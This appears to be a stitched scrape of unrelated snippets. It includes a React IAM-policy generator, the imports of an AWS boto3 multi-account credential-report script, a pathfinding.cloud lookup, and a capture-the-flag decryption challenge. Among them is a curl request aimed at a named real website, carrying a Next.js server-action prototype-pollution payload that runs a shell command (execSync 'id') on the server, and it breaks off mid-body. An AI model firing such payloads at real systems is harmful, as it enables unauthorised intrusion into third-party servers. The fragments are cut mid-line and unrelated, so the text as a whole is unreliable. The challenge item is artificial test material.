| import React, { useState } from 'react'; | |
| import { Send, FileCode, Shield, Loader2, Copy, Check } from 'lucide-react'; | |
| export default function IAMPolicyGenerator() { | |
| const [userRequest, setUserRequest] = useState(''); | |
| const [loading, setLoading] = useState(false); | |
| const [result, setResult] = useState(null); | |
| const [error, setError] = useState(''); | |
| const [copiedPolicy, setCopiedPolicy] = useState(false); | |
| const [copiedCfn, setCopiedCfn] = useState(false); |
| import boto3 | |
| import csv | |
| from concurrent.futures import ThreadPoolExecutor, as_completed | |
| from datetime import datetime | |
| import json | |
| import argparse | |
| from typing import List, Dict, Tuple, Optional | |
| from rich.progress import Progress, SpinnerColumn, TextColumn, BarColumn, TimeRemainingColumn | |
| from rich.console import Console |
| curl -sk https://pathfinding.cloud/paths.json | jq | |
| https://securitylabs.datadoghq.com/articles/introducing-pathfinding.cloud/ | |
| #!/usr/bin/env python3 | |
| """ | |
| AWS Multi-Account Credential Report Script | |
| Assumes a role across multiple AWS accounts and retrieves IAM credential reports. | |
| """ | |
| import boto3 | |
| import csv | |
| import time | |
| from concurrent.futures import ThreadPoolExecutor, as_completed |
curl --path-as-is -i -s -k -X $'POST' \
-H $'Host: www.redbullmobile.om' -H $'Next-Action: x' -H $'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad' -H $'Content-Length: 740' \
--data-binary $'------WebKitFormBoundaryx8jO2oVc6SWP3Sad\x0d\x0aContent-Disposition: form-data; name=\"0\"\x0d\x0a\x0d\x0a{\x0d\x0a \"then\": \"$1:__proto__:then\",\x0d\x0a \"status\": \"resolved_model\",\x0d\x0a \"reason\": -1,\x0d\x0a \"value\": \"{\\\"then\\\":\\\"$B1337\\\"}\",\x0d\x0a \"_response\": {\x0d\x0a \"_prefix\": \"var res=process.mainModule.require(\'child_process\').execSync(\'id\',{\'timeout\':5000}).toString().trim();;throw Object.assign(new Error(\'NEXT_REDIRECT\'), {digest:`${res}`});\",\x0d\x0a \"_chunks\": \"$Q2\",\x0d\x0a \"_formData\": {\x0d\x0a \"get\": \"$1:constructor:constructor\"\x0d\x0a }\x0d\x0a | Cipher Chronicles: The Leaky Dispatch | |
| 200 | |
| AF2025 | |
| 0 0 | |
| One of our agents sent us this dispatch, but we fear it was intercepted and tampered with. We know it's been encoded to look like nonsense and then encrypted. Our agent's field manual mentions a “Primary” protocol they always use to generate the key. We need you to decrypt the message and recover the flag. We have obtained intelligence indicating that the target is employing double encryption. | |
| Dispatch File: UkJtaG9wdGlob1ZHOFlsOFVpMWlJVmcwMTVLd2ViTzBQcm1mS0FFUA== |